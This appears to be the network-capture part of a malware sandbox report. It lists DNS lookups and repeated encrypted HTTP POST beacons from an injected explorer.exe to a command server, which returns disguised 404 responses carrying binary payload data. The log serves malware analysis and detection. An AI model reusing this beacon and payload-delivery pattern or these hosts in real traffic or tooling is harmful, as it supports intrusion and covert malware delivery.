                                                                                                                                                                    Jan 7, 2024 05:30:07.994251966 CET1.1.1.1192.168.2.40xef2eNo error (0)hugo.topteamlife.com104.21.26.173A (IP address)IN (0x0001)false
                                                                                                                                                                    Jan 7, 2024 05:30:07.994251966 CET1.1.1.1192.168.2.40xef2eNo error (0)hugo.topteamlife.com172.67.138.35A (IP address)IN (0x0001)false
                                                                                                                                                                    Jan 7, 2024 05:30:29.157167912 CET1.1.1.1192.168.2.40xc206No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                                                                                                                                    Jan 7, 2024 05:30:34.955676079 CET1.1.1.1192.168.2.40x2b2eNo error (0)t.me149.154.167.99A (IP address)IN (0x0001)false
                                                                                                                                                                    Jan 7, 2024 05:30:35.885216951 CET1.1.1.1192.168.2.40xb9e3No error (0)gxutc2c.com109.175.29.39A (IP address)IN (0x0001)false
                                                                                                                                                                    Jan 7, 2024 05:30:35.885216951 CET1.1.1.1192.168.2.40xb9e3No error (0)gxutc2c.com211.119.84.111A (IP address)IN (0x0001)false
                                                                                                                                                                    Jan 7, 2024 05:30:35.885216951 CET1.1.1.1192.168.2.40xb9e3No error (0)gxutc2c.com175.119.10.231A (IP address)IN (0x0001)false
                                                                                                                                                                    Jan 7, 2024 05:30:35.885216951 CET1.1.1.1192.168.2.40xb9e3No error (0)gxutc2c.com187.134.45.172A (IP address)IN (0x0001)false
                                                                                                                                                                    Jan 7, 2024 05:30:35.885216951 CET1.1.1.1192.168.2.40xb9e3No error (0)gxutc2c.com2.180.10.7A (IP address)IN (0x0001)false
                                                                                                                                                                    Jan 7, 2024 05:30:35.885216951 CET1.1.1.1192.168.2.40xb9e3No error (0)gxutc2c.com189.232.29.90A (IP address)IN (0x0001)false
                                                                                                                                                                    Jan 7, 2024 05:30:35.885216951 CET1.1.1.1192.168.2.40xb9e3No error (0)gxutc2c.com190.12.87.61A (IP address)IN (0x0001)false
                                                                                                                                                                    Jan 7, 2024 05:30:35.885216951 CET1.1.1.1192.168.2.40xb9e3No error (0)gxutc2c.com179.25.14.228A (IP address)IN (0x0001)false
                                                                                                                                                                    Jan 7, 2024 05:30:35.885216951 CET1.1.1.1192.168.2.40xb9e3No error (0)gxutc2c.com187.204.88.251A (IP address)IN (0x0001)false
                                                                                                                                                                    Jan 7, 2024 05:30:35.885216951 CET1.1.1.1192.168.2.40xb9e3No error (0)gxutc2c.com95.158.162.200A (IP address)IN (0x0001)false
                                                                                                                                                                    Jan 7, 2024 05:30:35.885256052 CET1.1.1.1192.168.2.40xb9e3No error (0)gxutc2c.com109.175.29.39A (IP address)IN (0x0001)false
                                                                                                                                                                    Jan 7, 2024 05:30:35.885256052 CET1.1.1.1192.168.2.40xb9e3No error (0)gxutc2c.com211.119.84.111A (IP address)IN (0x0001)false
                                                                                                                                                                    Jan 7, 2024 05:30:35.885256052 CET1.1.1.1192.168.2.40xb9e3No error (0)gxutc2c.com175.119.10.231A (IP address)IN (0x0001)false
                                                                                                                                                                    Jan 7, 2024 05:30:35.885256052 CET1.1.1.1192.168.2.40xb9e3No error (0)gxutc2c.com187.134.45.172A (IP address)IN (0x0001)false
                                                                                                                                                                    Jan 7, 2024 05:30:35.885256052 CET1.1.1.1192.168.2.40xb9e3No error (0)gxutc2c.com2.180.10.7A (IP address)IN (0x0001)false
                                                                                                                                                                    Jan 7, 2024 05:30:35.885256052 CET1.1.1.1192.168.2.40xb9e3No error (0)gxutc2c.com189.232.29.90A (IP address)IN (0x0001)false
                                                                                                                                                                    Jan 7, 2024 05:30:35.885256052 CET1.1.1.1192.168.2.40xb9e3No error (0)gxutc2c.com190.12.87.61A (IP address)IN (0x0001)false
                                                                                                                                                                    Jan 7, 2024 05:30:35.885256052 CET1.1.1.1192.168.2.40xb9e3No error (0)gxutc2c.com179.25.14.228A (IP address)IN (0x0001)false
                                                                                                                                                                    Jan 7, 2024 05:30:35.885256052 CET1.1.1.1192.168.2.40xb9e3No error (0)gxutc2c.com187.204.88.251A (IP address)IN (0x0001)false
                                                                                                                                                                    Jan 7, 2024 05:30:35.885256052 CET1.1.1.1192.168.2.40xb9e3No error (0)gxutc2c.com95.158.162.200A (IP address)IN (0x0001)false
                                                                                                                                                                    Jan 7, 2024 05:30:35.885334015 CET1.1.1.1192.168.2.40xb9e3No error (0)gxutc2c.com109.175.29.39A (IP address)IN (0x0001)false
                                                                                                                                                                    Jan 7, 2024 05:30:35.885334015 CET1.1.1.1192.168.2.40xb9e3No error (0)gxutc2c.com211.119.84.111A (IP address)IN (0x0001)false
                                                                                                                                                                    Jan 7, 2024 05:30:35.885334015 CET1.1.1.1192.168.2.40xb9e3No error (0)gxutc2c.com175.119.10.231A (IP address)IN (0x0001)false
                                                                                                                                                                    Jan 7, 2024 05:30:35.885334015 CET1.1.1.1192.168.2.40xb9e3No error (0)gxutc2c.com187.134.45.172A (IP address)IN (0x0001)false
                                                                                                                                                                    Jan 7, 2024 05:30:35.885334015 CET1.1.1.1192.168.2.40xb9e3No error (0)gxutc2c.com2.180.10.7A (IP address)IN (0x0001)false
                                                                                                                                                                    Jan 7, 2024 05:30:35.885334015 CET1.1.1.1192.168.2.40xb9e3No error (0)gxutc2c.com189.232.29.90A (IP address)IN (0x0001)false
                                                                                                                                                                    Jan 7, 2024 05:30:35.885334015 CET1.1.1.1192.168.2.40xb9e3No error (0)gxutc2c.com190.12.87.61A (IP address)IN (0x0001)false
                                                                                                                                                                    Jan 7, 2024 05:30:35.885334015 CET1.1.1.1192.168.2.40xb9e3No error (0)gxutc2c.com179.25.14.228A (IP address)IN (0x0001)false
                                                                                                                                                                    Jan 7, 2024 05:30:35.885334015 CET1.1.1.1192.168.2.40xb9e3No error (0)gxutc2c.com187.204.88.251A (IP address)IN (0x0001)false
                                                                                                                                                                    Jan 7, 2024 05:30:35.885334015 CET1.1.1.1192.168.2.40xb9e3No error (0)gxutc2c.com95.158.162.200A (IP address)IN (0x0001)false
                                                                                                                                                                    Jan 7, 2024 05:30:38.489567995 CET1.1.1.1192.168.2.40x52c5No error (0)pastebin.com104.20.68.143A (IP address)IN (0x0001)false
                                                                                                                                                                    Jan 7, 2024 05:30:38.489567995 CET1.1.1.1192.168.2.40x52c5No error (0)pastebin.com172.67.34.170A (IP address)IN (0x0001)false
                                                                                                                                                                    Jan 7, 2024 05:30:38.489567995 CET1.1.1.1192.168.2.40x52c5No error (0)pastebin.com104.20.67.143A (IP address)IN (0x0001)false
                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    0192.168.2.44973591.215.85.120802580C:\Windows\explorer.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Jan 7, 2024 05:29:18.492352009 CET283OUTPOST /index.php HTTP/1.1
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                    Accept: */*
                                                                                                                                                                    Referer: http://mbtiqoisbng.net/
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                    Content-Length: 161
                                                                                                                                                                    Host: selebration17io.io
                                                                                                                                                                    Jan 7, 2024 05:29:18.492508888 CET161OUTData Raw: 48 9d 8c cf 4e 66 52 2e 5c 70 53 26 79 db 22 ca 21 68 99 14 f8 19 aa da b2 19 a5 8c 03 85 de 92 f9 ac 8e bf 74 44 90 b7 a4 28 6a 7e 83 8a fc 12 f0 5f 3d 01 00 86 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 ba 8a 14 62 cc d6 4f 96 9e d0 30 d5
                                                                                                                                                                    Data Ascii: HNfR.\pS&y"!htD(j~_=;}f=B!bO0e/(*nITQ4l<>F&"*8
                                                                                                                                                                    Jan 7, 2024 05:29:18.704577923 CET195INHTTP/1.1 404 Not Found
                                                                                                                                                                    Server: nginx/1.18.0
                                                                                                                                                                    Date: Sun, 07 Jan 2024 04:29:18 GMT
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    Data Raw: 38 0d 0a 04 00 00 00 1f 3d 5a e4 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: 8=Z0
                                                                                                                                                                    Jan 7, 2024 05:29:18.709256887 CET287OUTPOST /index.php HTTP/1.1
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                    Accept: */*
                                                                                                                                                                    Referer: http://cflepwuecdwdlle.org/
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                    Content-Length: 114
                                                                                                                                                                    Host: selebration17io.io
                                                                                                                                                                    Jan 7, 2024 05:29:18.709294081 CET114OUTData Raw: 48 9d 8c cf 4e 66 52 2e 5c 70 53 26 79 db 22 ca 21 68 99 14 f8 19 aa da b2 19 a5 8c 03 85 de 92 f9 ac 8e bf 74 44 90 b7 a4 28 6a 7e 83 8a fc 12 f0 5f 3d 01 00 86 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a2 19 ba 8a 14 62 cd d6 4f 96 a3 a2 5c ca
                                                                                                                                                                    Data Ascii: HNfR.\pS&y"!htD(j~_=;}f=B!bO\m9&IQtyhZ
                                                                                                                                                                    Jan 7, 2024 05:29:18.925646067 CET1286INHTTP/1.1 404 Not Found
                                                                                                                                                                    Server: nginx/1.18.0
                                                                                                                                                                    Date: Sun, 07 Jan 2024 04:29:18 GMT
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    Data Raw: 31 66 36 36 0d 0a 02 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 c5 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 48 93 80 40 51 0c 96 29 fd 5c 6d e5 21 cf b1 26 ad 77 14 07 ef f1 5c 2f 37 bb 0c a4 59 3f b7 e6 06 60 f7 90 aa 17 d3 91 53 98 a8 e9 86 3d d5 2b d6 52 a9 aa ce 6e b9 fd f4 f7 7f 08 00 b6 5f 96 43 35 30 ce 1a fe c9 80 64 91 54 5b fd 55 19 d0 ed 05 70 b1 17 22 58 4a 63 0a 62 3e 59 20 03 5a a8 c3 1c 0c 56 3f cb 00 23 be 42 15 37 07 51 72 f1 ca 16 94 1d 79 52 2b e5 fd a3 7b 7e e8 ee ff 7f af 55 db c4 1d 13 13 bf 9e e1 92 24 08 4f d5 03 b1 cb a1 61 6e de f5 6c b9 19 17 7e 5f af 9a a0 44 c9 a0 c1 b9 dd 7a 0d 60 6e 19 e0 3c 95 a9 52 0d d4 96 bc 25 50 e1 9a d4 2e 7c 88 38 c8 48 6b a1 d0 4a 9a 13 fd ec 9e aa 7b ac 97 2f bd 61 05 c0 5d bf 20 34 fd f8 0e e8 33 6c b9 7d 0a 8d c7 7d c4 0e cc fb 7e 71 eb 80 f5 1a 68 9b 4a d8 19 ae cc 4f 3b 79 82 ae 9c 37 22 4c f9 7b ad f3 d7 93 28 b9 6e ee cc 23 b2 75 0e 31 79 92 90 f7 df f5 ec e7 72 2b 4c 80 d0 12 f9 13 63 11 bb d6 af 31 3c 27 d4 69 b7 9f 33 c9 cc 46 d9 48 15 ac af 6b d9 55 65 ae ba 68 92 0e ff 9d 7f 7f 55 40 57 64 7b 39 66 e7 ac 04 28 84 42 40 77 9b c7 9b aa 93 58 1e 85 8a 64 b1 ce 59 12 51 8c 60 17 4b 81 1b df 8e 82 11 e8 e4 1f 5e a1 90 4e a1 54 55 a5 8e b7 1b 54 c3 cb 49 5a 5e 90 39 7f 54 ab 1e 29 73 11 ee c3 4e 57 a3 4c 0d 85 1f d4 dc 68 91 9c 29 06 f1 2c 5e ae 03 5b e5 1f e4 a0 7d 10 df 3e dd b8 c4 f8 07 99 8a fd 9a 7f 74 79 c0 6d 43 cc 39 8b 8b e1 f2 7a d7 9c 88 c3 e0 2b a9 b4 bb 01 7a 17 28 92 ae 46 df 94 a1 aa 7a 8f f6 6b e3 4a c1 d9 37 00 90 e2 1c c9 00 f5 52 48 d4 3b 96 4d cb e7 17 3f dc e5 7e 4d a6 70 d4 43 eb ac 58 35 21 41 99 d6 cf 25 2e 17 87 ce ec 35 a8 c2 a7 0d 88 ca d4 5f 19 42 43 9c 55 03 62 18 3a 1d f8 40 aa ae 88 81 c4 a1 f3 0b 3e 88 fd c3 e8 c8 2f e1 c6 16 e8 8b 73 1f ac 18 88 68 b3 0e c3 80 19 13 88 b9 8c f5 18 97 52 b9 c1 ea 9e 53 e8 b8 0c 6b 90 94 12 f9 22 d9 ed 6f a2 52 dc 1a 1e ab 18 57 01 01 7d 42 83 a1 96 7f d8 2e 27 9d df 3c 42 56 60 de 9e 33 0f b6 25 8c 57 7a 14 0f 5b 30 5f a4 e7 b8 78 fe 11 ae 98 6d 48 5e 32 d0 49 d3 32 42 c2 39 16 12 47 0b e9 17 10 8d e3 11 20 b2 7f db 10 54 5a 17 1c 5c 5a 16 b3 19 5f 11 8f 69 f9 e4 39 2a 01 6e f1 fd 58 b3 dc 95 25 1c 90 53 72 5e 15 33 b5 01 82 e3 92 c2 01 6d 7e d3 85 bc 43 cf 76 62 93 45 e1 05 85 d4 9c 97 2e 60 10 3a 93 8b 94 e5 fe d6 ae 32 c8 6e d5 8d 4a ad fb 91 65 69 17 ee f3 af 84 ed 67 e1 a2 3a 84 aa 58 5d 1c 79 9b 37 67 d2 1f ad af ac d5 54 24 d1 e4 dd b2 3a 6a c0 8e ad 90 bb 9a 05 71 77 92 ae 0f 27 d1 9c 65 53 55 cd ab 48 63 36 cc 82 8e 82 a4 9e 9c bf cb b3 f2 fe 92 c6 5a 6b 76 62 8c c9 69 c7 32 a7 90 4e b0 d4 08 d9 4e 2f 18 4b 74 f8 4f b5 24 74 05 f6 6c 1d bf 9d 69 13 23 92 37 88 32 78 7e 66 0b 1b b9 fb 35 51 ed 00 e4 26 0d 72 d7 a2 65 3f 3f 1c f9 e1 f7 66 08 60 f4 ce 89 ca 3b d4 85 08 c7 18 47 64 00 2d ed 07 fc ae 1c 0b 30 63 3d 01 28 2b 77 33 c3 00 45 3d 79 24 0d 1e eb 67 f9 7d d8 ef fe cd f0 a8 01 3f 26 58 c5 07 1f ad d6 46 43 7c 20 4b b2 cf dd a9 8c 29 02 3d 89 31 99 a5 13 01 6e 01 2e 10 72 c8 ad f4 ae e4 47 29 fb d8 a7 22 40 42 c1 6f 02 89 cc 05 81 55
                                                                                                                                                                    Data Ascii: 1f66`@0,xO}q4 IJ%9Wd8IkDJ8P>%y^\.Kij}S.;vKs6(p_6k)|p|t]ShG*H@Q)\m!&w\/7Y?`S=+Rn_C50dT[Up"XJcb>Y ZV?#B7QryR+{~U$Oanl~_Dz`n<R%P.|8HkJ{/a] 43l}}~qhJO;y7"L{(n#u1yr+Lc1<'i3FHkUehU@Wd{9f(B@wXdYQ`K^NTUTIZ^9T)sNWLh),^[}>tymC9z+z(FzkJ7RH;M?~MpCX5!A%.5_BCUb:@>/shRSk"oRW}B.'<BV`3%Wz[0_xmH^2I2B9G TZ\Z_i9*nX%Sr^3m~CvbE.`:2nJeig:X]y7gT$:jqw'eSUHc6Zkvbi2NN/KtO$tli#72x~f5Q&re??f`;Gd-0c=(+w3E=y$g}?&XFC| K)=1n.rG)"@BoU
                                                                                                                                                                    Jan 7, 2024 05:29:18.925741911 CET1286INData Raw: 0c e3 56 f6 a8 b4 f3 5b 11 8f 41 bd 0a 29 78 87 9b 68 ca 4b c2 7b 28 b0 cf bb 66 56 9a 3c 5c e3 9c 17 6b 18 67 cd d2 f3 bb 75 e0 91 ce e0 ae 08 4b 84 6e 25 2f 74 4d ab 61 98 4b 24 5b cc ba 0f 14 78 c5 8a d3 0e 3a 03 2a 79 2b 0d 8f 3d ef a2 86 89
                                                                                                                                                                    Data Ascii: V[A)xhK{(fV<\kguKn%/tMaK$[x:*y+=OY[\BA`7(Ax=eC26m) M%co}TZ>2\A/pG<C4,um\og~$zX9;67=74J!YAPG6/<C1t7
                                                                                                                                                                    Jan 7, 2024 05:29:18.925801992 CET1286INData Raw: a3 bb 0e fd 22 ee 70 28 99 65 30 a1 a9 09 58 c9 e0 2b e7 cc b1 ba 23 30 2e 38 f4 43 8c 12 1f 89 f8 28 c1 35 8d 2c d0 a3 73 bc a6 6e a9 23 92 bd d1 34 bb ad 11 c3 78 0c 1b 27 90 55 4c c4 30 17 ec 53 fc 51 4a 4f ca 28 1f 4b d4 de f2 1f 06 b9 be 51
                                                                                                                                                                    Data Ascii: "p(e0X+#0.8C(5,sn#4x'UL0SQJO(KQ?']vxCjKa`i\D#k8^*]mCv2C8kS*-`"iK6@L7$';s2}Hah#5VhEH hatw-s
                                                                                                                                                                    Jan 7, 2024 05:29:18.925879002 CET1286INData Raw: d9 c7 20 88 0c 8f 54 70 ef 7c 52 b7 b2 f8 7f 9c a0 d4 eb c9 45 f9 05 3b d4 d1 be a0 ae 8d 4c 2d 8e 02 d4 58 02 45 7d 44 9e b3 f0 1c da 49 5e 9e 3d e5 64 1f 51 2b 4e 92 d5 2d 6e 2f 1f 07 e9 25 76 b6 16 62 27 d7 1b a5 36 7a d7 3b 59 50 e9 f9 59 12
                                                                                                                                                                    Data Ascii: Tp|RE;L-XE}DI^=dQ+N-n/%vb'6z;YPY/O(jlgv+Frz/V^p5z! [*+LAG^G"^J.?xn9t,of?VkiB~P2f=chi06^waK=1{#[}NO-S
                                                                                                                                                                    Jan 7, 2024 05:29:18.925928116 CET1286INData Raw: 50 b0 7d ff be d5 71 ed 0a aa 84 62 42 5a 2e ea 0c 15 a0 37 02 da e2 78 be d3 74 90 2f a4 e4 f4 52 da da 48 38 43 09 41 e7 05 5c ea 01 e0 ff 39 1c 8d 03 1c e7 8f 95 93 26 90 c0 68 9d ab 99 07 2c 2c da 58 4f ed 68 27 79 68 3c da 73 36 a7 5d 32 5e
                                                                                                                                                                    Data Ascii: P}qbBZ.7xt/RH8CA\9&h,,XOh'yh<s6]2^W fytTxG!*RZVK/I 6%i[Jn)t,F`tC.w}d!y7VT{#7>yZc/5qq^4Pb:?{X
                                                                                                                                                                    Jan 7, 2024 05:29:18.926013947 CET1286INData Raw: da 06 72 9a 52 ff 1e 06 c5 fb 46 04 6f 54 4a 9f aa 11 7b f1 c3 55 73 f1 6b 75 81 ce 64 23 a8 84 bd a8 11 27 06 d3 a8 ca 8b e0 e6 3d 50 b5 08 e9 9f 07 c4 b7 ce 1c c4 cc 91 bb 11 e3 d9 68 22 fc 7a 64 dd 24 43 ad a8 76 cc 62 20 a5 35 d7 d1 42 62 38
                                                                                                                                                                    Data Ascii: rRFoTJ{Uskud#'=Ph"zd$Cvb 5Bb8#4z_"#|xk^i8K%nP>Z8gic2*k"bFt7(Lt%]HB]Ya&28%?;
                                                                                                                                                                    Jan 7, 2024 05:29:18.926093102 CET1286INData Raw: b4 f5 e8 08 f8 58 0e 51 5a 96 f1 b2 6b 3a 12 5c cd d0 df 0f 68 e3 74 3d ce 8a 6d 81 2d 30 ca e9 79 dc 4e 6a 87 1e 0f a7 62 81 4d 4a d8 ec c1 23 bf a8 43 77 7e be da 91 5e 5f a0 7b 1a 7d cc fd d9 2b a2 95 19 e8 a7 6b bb c3 bf 56 dd 57 e8 78 1c 59
                                                                                                                                                                    Data Ascii: XQZk:\ht=m-0yNjbMJ#Cw~^_{}+kVWxY.cy)-jm,]P}$#K]Qy"0:SD91!"WF@~ncH7/!e,/_*F=b*'?2?k
                                                                                                                                                                    Jan 7, 2024 05:29:18.926203966 CET1286INData Raw: ed 9d 06 f6 87 13 df 95 3e c4 24 f6 2a fe 77 1b dd 19 bc a2 6b aa 30 d5 fa 69 23 cd 41 73 0b e7 39 47 b3 0a 22 5d 1d e6 2a 14 ac b2 39 1c 3e 97 98 31 46 3c 54 19 e5 0d 43 db aa d4 af 6b 7d eb b9 5c 6c ea 68 29 50 e6 4a 96 12 4f 24 8b a8 8b 16 63
                                                                                                                                                                    Data Ascii: >$*wk0i#As9G"]*9>1F<TCk}\lh)PJO$c dK<R%5H,O1wKFzm7[!"D]rs|<Fa0Ew!fEI$`@-e9b_4[c?1eB+YCa?pb\0dO.Soqmy
                                                                                                                                                                    Jan 7, 2024 05:29:18.926275969 CET1286INData Raw: cd 3e 2d 8e fe 5a b2 6d 5b 93 75 da 82 a1 71 22 e6 15 66 9e 96 b9 4e 8f 12 ab 3b a2 3c 66 85 3c 36 0c b4 2c 26 ba 9b d5 97 26 de dc 75 e9 47 3d 1e 0b 86 49 af 58 2e c2 76 a9 96 47 83 5f 92 b5 4f 99 a7 4c 91 39 e4 00 d6 83 a8 e3 c1 6c 2d b3 61 ed
                                                                                                                                                                    Data Ascii: >-Zm[uq"fN;<f<6,&&uG=IX.vG_OL9l-at_T#"bu?{^ulN|e"]mvL*Dn1S]06'e4iS2^=oTua3e<&e*?oI'S
                                                                                                                                                                    Jan 7, 2024 05:29:21.408916950 CET287OUTPOST /index.php HTTP/1.1
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                    Accept: */*
                                                                                                                                                                    Referer: http://cbguytuewcurtbx.com/
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                    Content-Length: 250
                                                                                                                                                                    Host: selebration17io.io
                                                                                                                                                                    Jan 7, 2024 05:29:21.620398998 CET604INHTTP/1.1 404 Not Found
                                                                                                                                                                    Server: nginx/1.18.0
                                                                                                                                                                    Date: Sun, 07 Jan 2024 04:29:21 GMT
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    Data Raw: 31 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 73 65 6c 65 62 72 61 74 69 6f 6e 31 37 69 6f 2e 69 6f 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at selebration17io.io Port 80</address></body></html>0
                                                                                                                                                                    Jan 7, 2024 05:29:21.624886990 CET287OUTPOST /index.php HTTP/1.1
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                    Accept: */*
                                                                                                                                                                    Referer: http://spoycyuufprnueh.net/
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                    Content-Length: 166
                                                                                                                                                                    Host: selebration17io.io
                                                                                                                                                                    Jan 7, 2024 05:29:21.837030888 CET1286INHTTP/1.1 404 Not Found
                                                                                                                                                                    Server: nginx/1.18.0
                                                                                                                                                                    Date: Sun, 07 Jan 2024 04:29:21 GMT
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    Data Raw: 31 66 36 36 0d 0a 00 00 b4 60 0b d4 0c 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 e5 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 93 0e 17 28 47 49 7e ae e9 bb 65 74 a3 47 3c 58 12 00 c6 ab b6 bc ec 4d 89 5f 15 af d4 d9 25 ff a3 40 3c 72 9b 63 c1 e8 12 ec ee 42 da fb 24 16 a6 67 4c 01 e2 55 70 9d 9e 6e bd af 63 a3 17 5e b9 61 c5 f6 8a 41 d2 60 54 68 56 42 01 e2 38 ae bf a1 67 99 fc d6 8d 86 db d6 1a 13 33 af a5 ac dd 6c ec bb 34 ed 07 ff b1 ba 6b 77 e5 4e 30 27 57 d1 50 ac db 35 2a 6f c1 c7 25 61 dd c8 2b cc 95 42 ac f5 03 23 f2 bb d4 d8 d7 d6 79 ac f0 b8 87 c8 e2 f6 1d a9 b3 a6 47 92 71 d7 21 7d 33 9e df c1 fa cb 1f 9e 1d 09 52 2b b5 c8 83 7b 32 44 f3 ff 3f a8 57 80 c4 0d 13 13 bf 1e e1 92 c4 08 4c c4 08 a0 c5 b1 61 3c dc f5 69 25 18 17 7e 5f af 9a 03 e4 c8 a0 c1 a9 dd 7a 0d f0 4c 19 e0 2c d5 a9 18 0a f5 96 be 27 51 61 9c d4 3e 7c 88 28 c8 48 6d a1 c0 4a 9a 03 fd ec 9e ba 7f ac 87 2b bd 61 cb 00 4e bf 45 34 fd 79 12 6c 23 6c 29 6c 0a 8d c7 fd f4 0e a4 fb 7e 71 eb 80 f5 1a 78 9b 4a d8 19 ae cc 4f 3b 79 82 ae d0 76 00 4c c1 56 ad f3 57 5b 29 b9 4e 4a cc 23 b2 75 0e 31 79 92 90 f7 6d a5 ff e7 b2 1a 4c 80 d0 12 f9 13 63 11 bb d6 9f e3 3e 27 80 69 b7 9f 33 c9 cc 46 d9 48 15 ac af eb d9 55 3d af ba 68 92 0e ff 9d 7f 7f 55 40 df b6 79 39 26 e7 ac 04 28 84 42 40 77 9b c7 9b 84 87 3f 66 35 89 64 b1 1d 30 12 51 8c 70 17 4b 81 6b df 8e 82 01 e8 e4 1f 5e a1 90 4e a1 54 55 8b fa d2 63 1b c3 cb 29 e3 69 e5 5b 1e 44 ab 1e 26 3f 13 ee c3 ca 57 a3 4c 1d 85 1f d4 5c 68 91 9c 29 06 f1 0c 5e ae 63 75 97 7b 85 d2 1c 10 9f 1a 2f d9 b0 99 67 9b 8a cd 7c 7f 74 79 16 6f 43 cc b9 8b 8b e1 62 7a d7 9c 88 c3 e0 6b a9 b4 fb 2f 1e 76 5c b3 ae 46 1f 24 fd aa 7a 8f f6 68 e3 cd c0 d9 37 00 5e e1 1c c9 20 f5 52 48 c4 3a 96 4d cb e7 17 7f dc e5 be 63 d4 03 a6 60 eb ac 98 4a ca 0f ca 82 af 26 2e 9f 30 ce ec 35 76 c1 a7 0d a8 ca d4 5f 29 43 43 9c 55 03 62 58 3a 1d b8 40 aa ae 88 c1 c4 a1 33 25 7d da a9 c3 e8 c8 2f cb e2 09 e8 8b 23 1e ac 18 b8 77 b3 0e 93 81 19 13 88 b9 8c f5 18 97 52 b9 c1 ea 9e 13 e8 b8 4c 45 e1 f0 73 8d 43 d9 ed 07 b2 52 dc 1a 9e 8b 18 57 21 01 7d 42 03 81 96 7f d8 2e 27 9d df 3c 42 56 60 de 9e 73 0f b6 65 a2 25 1f 78 60 38 30 5f d6 a6 b8 78 fe b1 8e 98 6d 18 5e 32 d0 e9 f3 32 42 c2 39 16 12 47 0b e9 17 10 8d e3 51 20 b2 3d db 10 54 5a 17 1c 5c 5a 16 b3 19 5f 11 8f 